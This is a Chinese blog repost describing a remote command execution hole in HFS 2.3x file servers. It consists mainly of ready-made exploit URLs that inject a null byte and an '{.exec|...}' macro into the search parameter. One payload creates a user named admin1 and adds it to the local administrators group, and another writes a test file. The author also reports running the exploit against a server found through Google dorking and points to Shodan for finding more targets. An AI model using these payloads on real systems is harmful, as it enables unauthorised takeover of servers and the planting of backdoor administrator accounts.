最新消息:

HFS 2.3x 远程命令执行

渗透 admin 2488浏览 0评论

转自:http://www.hackqing.com/index.asp?FoxNews=1268.html
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。

http://localhost:80/?search=%00{.exec|cmd.}
http://localhost:80/search=%00{.exec|cmd.}

注:有些版本search前面是没有?的。

ps:添加用户(注意如果执行语句中有&要进行url编码):

http://localhost/?search=%00{.exec|cmd.exe%20/c%20net%20user%20admin1%20admin1%20/add%26net%20localgroup%20administrators%20admin1%20%20/add%20.}

QQ截图20140923222320

QQ截图20140923222407

 

测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:
http://localhost:8080/?search=%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}
google hack了一下,发现一个抓鸡黑阔:

jinglingshu_2014-09-23_14-16-55

已测试官方最新版,一样存在。

jinglingshu_2014-09-23_14-16-55

撒旦似乎不少:
jinglingshu_2014-09-23_14-16-52

转载请注明:jinglingshu的博客 » HFS 2.3x 远程命令执行


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址